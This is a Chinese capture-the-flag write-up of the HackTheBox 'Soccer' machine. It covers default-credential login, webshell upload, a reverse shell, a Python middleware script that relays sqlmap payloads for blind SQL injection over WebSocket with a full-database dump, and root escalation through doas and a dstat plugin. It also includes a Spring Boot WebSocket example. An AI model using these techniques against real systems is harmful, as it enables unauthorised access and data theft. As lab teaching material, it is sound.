hackthebox-Soccer

靶机地址
10.10.11.194
user权限


发现存在80端口嘛然后访问一下
然后发现转到域名为

本地绑定一下IP和域名

这里因为是htb的靶场就不扫子域名了直接爆目录

扫到一个目录上去看看，然后发现是个登录框

h3k,Tiny File Manager这些都是一些关键字然后再源代码里面看了看没有找到什么东西只能求助万能的百度了
h3k没什么东西最后找到了Tiny File Manager这个东西在git上面是开源的
项目地址：https://github.com/prasathmani/tinyfilemanager

是一个php文件管理的cms有源码的也有管理员默认账号密码尝试登录一下，然后成功的进来了

然后发现文件上传功能，找了个路径点

上传了文件并且拿到了shell

然后这台主机是linux的主机尝试用nc去获取交互shell

拿到shell
上传某个脚本进行一下信息收集

中间发现很多提权脚本

随后在Nginx模块发现了一个子域名

子域名是一个soc-player.soccer.htb

随后注册账户进来

这段英文的意思是要检查们的票据，然后我们抓包尝试一下
抓出来发现就是一个纯纯的ID

这种json格式的数据
当我发送给repeaeter的时候burp自动帮我识别了这是一个WebSockets，我测了半天我不会了，sockets这个协议的漏洞我都没有怎么碰到过，然后去看了wp
这里是一个WebSockets的sql注入

根据代码分析我们需要传入的msg是id
这里有一篇关于sockets的sql注入的文章
https://rayhan0x01.github.io/ctf/2021/04/02/blind-sqli-over-websocket-automation.html
用它结合着sqlmap进行测试
根据这篇文章修改我们的参数

1. from http.server import SimpleHTTPRequestHandler
2. from socketserver import TCPServer
3. from urllib.parse import unquote, urlparse
4. from websocket import create_connection
6. ws_server = "ws://soc-player.soccer.htb:9091/"
8. def send_ws(payload):
9.         ws = create_connection(ws_server)
10.         # If the server returns a response on connect, use below line
11.         #resp = ws.recv() # If server returns something like a token on connect you can find and extract from here
13.         # For our case, format the payload in JSON
14.         message = unquote(payload).replace('"','\'') # replacing " with ' to avoid breaking JSON structure
15.         data = '{"id":"%s"}' % message
17.         ws.send(data)
18.         resp = ws.recv()
19.         ws.close()
21.         if resp:
22.                 return resp
23.         else:
24.                 return ''
26. def middleware_server(host_port,content_type="text/plain"):
28.         class CustomHandler(SimpleHTTPRequestHandler):
29.                 def do_GET(self) -> None:
30.                         self.send_response(200)
31.                         try:
32.                                 payload = urlparse(self.path).query.split('=',1)[1]
33.                         except IndexError:
34.                                 payload = False
36.                         if payload:
37.                                 content = send_ws(payload)
38.                         else:
39.                                 content = 'No parameters specified!'
41.                         self.send_header("Content-type", content_type)
42.                         self.end_headers()
43.                         self.wfile.write(content.encode())
44.                         return
46.         class _TCPServer(TCPServer):
47.                 allow_reuse_address = True
49.         httpd = _TCPServer(host_port, CustomHandler)
50.         httpd.serve_forever()
53. print("[+] Starting MiddleWare Server")
54. print("[+] Send payloads in http://localhost:8081/?id=*")
56. try:
57.         middleware_server(('0.0.0.0',8081))
58. except KeyboardInterrupt:
59.         pass

复制代码

然后使用sqlmap去跑参数

1. sqlmap -u http://localhost:8081/?id=1 --dump-all --exclude-sysdbs
2. --dump-all：查找并转储找到的所有数据库
3. --exclude-sysdbs：不会在默认数据库上浪费时间

复制代码

用findshell连上去以后拿下user权限

root权限

后面的就更是我的知识盲区了，是在刚刚的信息收集的时候发现的一些东西有一个叫做doas

这是那些地软件有suid权限

什么意思呢就是说我们可以用这个东西来执行sudo指令，我们只需要用这个创建一个shell我们就可以相当于执行了一个 sudo bin/bash
我们先找一下这个软件在哪
通过查看dstat程序的官方文档，发现我们可以编写插件并执行，名称必须为dstat_*.py，插件存放的目录为/usr/local/share/dstat/
找到之后创建一个插件

1. cd /usr/local/share/dstat/
2. touch dstat_baimao.py
3. chmod 777 dstat_baimao.py

复制代码

已经提升到root权限了我自己都还没注意到存到
小结一下

• WebSockets是个什么东西还有什么其他可以利用的点，自己用java去实现一遍
  
• sock的sql注入的脚本需要自己去学习一下其中的原理是怎么构成的。
  

WebSockets

WebSockets 是一种先进的技术。它可以在用户的浏览器和服务器之间打开交互式通信会话。使用此 API，您可以向服务器发送消息并接收事件驱动的响应，而无需通过轮询服务器的方式以获得响应。
简单的自己实现Sockets
还是用springboot去开发
配置类

1. mport org.springframework.context.annotation.Bean;
2. import org.springframework.context.annotation.Configuration;
3. import org.springframework.web.socket.server.standard.ServerEndpointExporter;
5. @Configuration
6. public class WebSocketConfig {
7.     /**
8.      *         注入ServerEndpointExporter，
9.      *         这个bean会自动注册使用了@ServerEndpoint注解声明的Websocket endpoint
10.      */
11.     @Bean
12.     public ServerEndpointExporter serverEndpointExporter() {
13.         return new ServerEndpointExporter();
14.     }
15.    
16. }

复制代码

处理类

1. @ServerEndpoint("/myWs")
2. @Component
3. public class WsServerEndpoint {
4.     /**
5.      * 连接成功
6.      * @param session
7.      */
8.     @OnOpen
9.     public void onOpen(Session session) {
10.         System.out.println("连接成功");
11.     }
13.     /**
14.      * 连接关闭
15.      * @param session
16.      */
17.     @OnClose
18.     public void onClose(Session session) {
19.         System.out.println("连接关闭");
20.     }
22.     /**
23.      * 接收到消息
24.      * @param text
25.      */
26.     @OnMessage
27.     public String onMsg(String text) throws IOException {
28.         return "servet 发送：" + text;
29.     }
30. }

复制代码

这几个注解分别对应着我们常用的三件套连接时候，断开时候，消息处理
@ServerEndpoint

• 通过这个 spring boot 就可以知道你暴露出去的 ws 应用的路径，有点类似我们经常用的@RequestMapping。比如你的启动端口是8080，而这个注解的值是ws，那我们就可以通过 ws://127.0.0.1:8080/ws 来连接你的应用。
  

@OnOpen

• 当 websocket 建立连接成功后会触发这个注解修饰的方法。
  

@OnClose

• 当 websocket 建立的连接断开后会触发这个注解修饰的方法。
  

@OnMessage

• 当客户端发送消息到服务端时，会触发这个注解修改的方法，它有一个 String 入参表明客户端传入的值。
  

@OnError

• 当 websocket 建立连接时出现异常会触发这个注解修饰的方法。
  

所以出现漏洞的点在于@OnMessage这个注解的方法这里做处理的时候和数据库进行交互的sql语句造成的注入
小脚本

我去大致的浏览了一下里面会收集的内容记住一些我觉得比较有意思的点
Executing Linux Exploit Suggester
这个会建议我们尝试一些提权操作
Searching uncommon passwd files
这个会有一些可以访问的passwd是一些密码文件
Possible private SSH keys were found!
ssh的key，
Some certificates were found (out limited)
一些证书文件，其实里面有很多有意思的东西，实战中肯定是先去尝试那些提权脚本当你提权不了的时候才开始尝试其他
的信息然后再收集信息去看其他提权方式

免责声明：如果侵犯了您的权益，请联系站长，我们会及时删除侵权内容，谢谢合作！